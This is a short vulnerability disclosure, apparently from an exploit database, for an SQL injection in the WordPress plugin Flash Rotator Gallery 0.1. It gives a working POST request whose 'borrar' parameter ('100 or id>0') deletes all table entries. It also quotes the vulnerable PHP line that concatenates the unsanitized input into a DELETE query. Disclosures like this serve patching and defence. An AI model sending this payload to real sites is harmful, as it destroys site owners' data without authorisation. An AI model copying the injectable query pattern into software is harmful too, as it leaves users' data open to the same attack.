# Exploit Title: WordPress plugin Flash Rotator Gallery - SQL injection
# Date: 2017-03-12
# Exploit Author: malwrforensics
# Vendor Homepage: http://www.webpsilon.com/wordpress-plugins/flash-rotator-gallery/
# Software Link: https://downloads.wordpress.org/plugin/flash-rotator-gallery.zip
# Version: 0.1
# Tested on: Linux
HTTP request data:
POST http://192.168.205.102/wordpress/wp-admin/admin.php?page=flash_rotator_gallery.php HTTP/1.1
<snip>
borrar=100+or+id>0 #delete all entries
Technical details:
Affected file: flash-rotator-gallery.php
<snip>
if(isset($_POST['borrar'])) {
$sql = "DELETE FROM $table_name WHERE id = ".$_POST['borrar'].";"; #$_POST['borrar'] is not sanitized
$wpdb->query($sql);
<snip>
Thanks.